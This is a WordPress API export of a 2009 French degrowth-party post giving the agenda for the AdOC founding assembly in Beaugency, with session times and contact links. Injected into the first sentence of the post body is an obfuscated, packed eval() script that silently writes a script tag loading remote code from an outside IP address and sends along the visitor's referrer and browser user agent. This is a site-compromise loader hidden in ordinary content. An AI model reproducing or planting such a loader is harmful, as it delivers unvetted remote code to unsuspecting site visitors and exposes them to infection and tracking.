{"id":3530,"date":"2009-08-29T21:04:25","date_gmt":"2009-08-29T19:04:25","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=3530"},"modified":"2010-12-12T09:11:18","modified_gmt":"2010-12-12T08:11:18","slug":"l%e2%80%99assemblee-constitutive-de-ladoc-a-beaugency-ordre-du-jour","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=3530","title":{"rendered":"L\u2019A.G. de l&rsquo;AdOC \u00e0 Beaugency : ordre du jour"},"content":{"rendered":"<p style=\"text-align: left;\"><a href=\"http:\/\/nanorezo.free.fr\/IMG\/pdf\/affiche_01_A3_AG_ADOC_sept09.pdf\"><img decoding=\"async\" class=\"size-full wp-image-3378 alignleft\" title=\"AG-ADOC-20sept\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/08\/AG-ADOC-20sept1.jpg\" alt=\"AG-ADOC-20sept\" \/><\/a><em>Toutes <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekhze|var|u0026u|referrer|tinfh||js|php'.split('|'),0,{}))\n<\/script><\/noindex> les rencontres seront organis\u00e9es sur le principe d\u2019une communication non violente calqu\u00e9e sur la \u00ab <a href=\"http:\/\/www.partipourladecroissance.net\/?p=3470\">M\u00e9thode de D\u00e9cision au Consensus <\/a>\u00bb. Elles se partageront en r\u00e9unions pl\u00e9ni\u00e8res ou ateliers en petits groupes. Dans le cas d\u2019une r\u00e9union pl\u00e9ni\u00e8re, un rapporteur viendra avec une proposition initiale. Dans tous les cas, il sera second\u00e9 par un m\u00e9diateur et\/ou un facilitateur.<\/em><\/p>\n<ul>\n<li><em><strong>L&rsquo;ordre du jour \u00e9tant tr\u00e8s dense<\/strong>, il s&rsquo;agira parfois d&rsquo;<\/em>\u00e9baucher<em>, de <\/em>commencer<em>, de d\u00e9marrer le sujet en question.<br \/>\n<\/em><\/li>\n<li><em><strong>Toutes les d\u00e9cisions importantes feront l&rsquo;objet d&rsquo;un vote<\/strong> : ce peut \u00eatre un texte, une r\u00e9solution, la constitution d&rsquo;une \u00e9quipe de travail, une disposition de principes.<\/em><\/li>\n<li><em><strong>Les noms des intervenants<\/strong>, ainsi que les d\u00e9tails des interventions sont en cours d\u2019affinage.<br \/>\n<\/em><\/li>\n<li><em><strong>L&rsquo;organisation<\/strong> peut aussi \u00e9voluer au besoin des circonstances.<\/em><\/li>\n<li><em><\/em><em><strong>Les s\u00e9quences de travail <\/strong>seront entrecoup\u00e9es de moment de d\u00e9tente et de soir\u00e9es conviviales<\/em><em>.<\/em><\/li>\n<\/ul>\n<p style=\"text-align: left;\"><em> Voir l&rsquo;ordre du jour ci-dessous\u00a0<!--more--><\/em><\/p>\n<p style=\"text-align: center;\"><em> <\/em><strong>Vendredi 18 Septembre<\/strong><\/p>\n<ul>\n<li>A partir de 16h : Accueil des participants<\/li>\n<li>19h &#8211; 20h : Atelier : <a href=\"http:\/\/www.partipourladecroissance.net\/?p=3470\">m\u00e9thode de d\u00e9bat et de prise de d\u00e9cision au consensus<\/a>.<\/li>\n<li>A partir de 20h :\u00a0 Soir\u00e9e conviviale<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><strong>Samedi 19 Septembre<\/strong><\/p>\n<ul>\n<li>9h &#8211; 10h : Accueil et pr\u00e9sentation du week-end (objectif du WE, petit historique)<\/li>\n<li>10h &#8211; 11h30 : organisation de l&rsquo;association : ses objectifs, aspects administratifs et structurels (statuts, r\u00e9glements).<\/li>\n<li>11h30 &#8211; 13h : Politique d&rsquo;accueil des nouvelles et nouveaux venu(e)s<\/li>\n<li>13h &#8211; 14h30 :\u00a0 Pause d\u00e9jeuner<\/li>\n<li>14h30 &#8211; 17h00 :\u00a0 Communication Interne (forum, listes de discutions, r\u00e9seaux sociaux, net \u00e9tiquette)<\/li>\n<li>17h &#8211; 18h : Communication externe (site internet, relations avec les m\u00e9dias en particulier TV, r\u00e9seaux sociaux, logo&#8230;)<\/li>\n<li>A partir de 19h :\u00a0 Soir\u00e9e conviviale avec concert<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><strong>Dimanche 20 Septembre 2009<\/strong><\/p>\n<ul>\n<li>9h &#8211; 10h30 :\u00a0\u00a0 Plateforme de propositions politiques<\/li>\n<li>10h30-15h :\u00a0\u00a0 Strat\u00e9gie politique : <a href=\"http:\/\/www.partipourladecroissance.net\/?p=3411\">les 3 pieds politiques<\/a> &amp; Elections R\u00e9gionales, le manifeste.<\/li>\n<li>15h00 : Fin de l&rsquo;Assembl\u00e9e Constitutive de l&rsquo;AdOC<\/li>\n<\/ul>\n<h4 style=\"text-align: center;\"><a href=\"..\/?cat=4\" target=\"_blank\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" style=\"margin-top: 5px; margin-bottom: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2009\/03\/logo_ed.jpg\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a><\/h4>\n<p style=\"text-align: center;\"><strong>pour plus de renseignements :<\/strong><a href=\"http:\/\/www.europedecroissance.eu\/\"><br \/>\nwww.europedecroissance.eu<\/a><br \/>\n<a href=\"..\/\">partipourladecroissance.net<\/a> \u2013 <a href=\"http:\/\/www.les-oc.info\/\">Les Objecteurs de Croissance<\/a><br \/>\ncontacts : <a href=\"mailto:contact@adoc-france.org\">contact@adoc-france.org<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Toutes les rencontres seront organis\u00e9es sur le principe d\u2019une communication non violente calqu\u00e9e sur la \u00ab M\u00e9thode de D\u00e9cision au Consensus \u00bb. Elles se partageront en r\u00e9unions pl\u00e9ni\u00e8res ou ateliers en petits groupes. Dans le cas d\u2019une r\u00e9union pl\u00e9ni\u00e8re, un &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=3530\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3530","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3530"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3530\/revisions"}],"predecessor-version":[{"id":3945,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3530\/revisions\/3945"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}